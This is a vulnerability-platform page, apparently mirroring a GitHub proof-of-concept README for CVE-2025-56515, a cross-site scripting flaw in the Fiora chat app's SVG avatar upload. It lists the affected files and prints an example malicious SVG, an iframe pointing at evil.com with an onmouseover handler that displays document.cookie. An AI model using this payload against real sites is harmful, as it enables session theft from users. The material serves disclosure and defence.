漏洞平台

POC详情： 1e0a43dae7e0298dbf896b73e85442ad13f67f37

来源

https://github.com/Kov404/CVE-2025-56515

关联漏洞

标题： Fiora 安全漏洞 (CVE-2025-56515)
描述：Fiora ·是yinxin630个人开发者的一个聊天应用程序。 Fiora 1.0.0版本存在安全漏洞，该漏洞源于用户头像上传功能未验证SVG文件内容，可能导致执行任意JavaScript代码。

描述

Cross-Site Scripting (XSS) Vulnerability in Fiora Chat Application

介绍

# CVE-2025-56515
Cross-Site Scripting (XSS) Vulnerability in Fiora Chat Application
# CVE-2025-56515: Cross-Site Scripting (XSS) Vulnerability in Fiora Chat Application

## Vulnerability Overview
**CVE ID**: CVE-2025-56515  
**Vulnerability Type**: Cross-Site Scripting (XSS)  
**Attack Type**: Remote  
**Impact**: Code Execution  
**Affected Product**: Fiora Chat Application (Version 1.0.0)  
**Vendor**: suisuijiang  
**Discoverer**: Kaio Mendonça Pereira  
**Vendor Confirmed**: Yes  
**References**:  
- [Fiora GitHub Repository](https://github.com/yinxin630/fiora)  
- [Fiora Application](https://fiora.suisuijiang.com/)  
- [CWE-79: Improper Neutralization of Input During Web Page Generation](https://cwe.mitre.org/data/definitions/79.html)

## Description
The Fiora chat application (version 1.0.0) is vulnerable to a Cross-Site Scripting (XSS) attack due to improper validation of SVG file content uploaded through the user avatar modification functionality. Authenticated users can upload malicious SVG files containing embedded `<foreignObject>` elements with `<iframe>` tags and JavaScript event handlers (e.g., `onmouseover`). When these SVG files are rendered in the browser, the embedded JavaScript executes, allowing attackers to steal user sessions, cookies, or perform unauthorized actions in the context of users viewing the affected profile.

## Affected Components
- `packages/server/src/routes/user.ts`
- `packages/web/src/modules/Sidebar/UserInfo.tsx`
- `packages/web/src/service.ts`
- `packages/web/src/components/Avatar.tsx`
- `/UserAvatar/` directory
- Function: `changeUserAvatar`

## Attack Vector
The vulnerability is exploited by uploading a malicious SVG file as a user avatar. The SVG file can include a `<foreignObject>` element containing an `<iframe>` with a JavaScript event handler, such as `onmouseover="alert(document.cookie)"`. When the avatar is rendered (e.g., on page reload or direct access to the SVG URL), the malicious JavaScript executes, bypassing the application's XSS protections. This enables attackers to perform actions such as:
- Stealing session cookies.
- Performing unauthorized actions in the context of the victim's session.
- Redirecting users to malicious sites.

### Example Malicious SVG Payload
```xml
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 100 100">
  <foreignObject x="0" y="0" width="100" height="100">
    <iframe xmlns="http://www.w3.org/1999/xhtml" src="https://evil.com" onmouseover="alert(document.cookie)" width="100" height="100"></iframe>
  </foreignObject>
  <text x="0" y="15"></text>
</svg>

文件快照


 [4.0K]  /data/pocs/1e0a43dae7e0298dbf896b73e85442ad13f67f37
└── [2.6K]  README.md

0 directories, 1 file

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。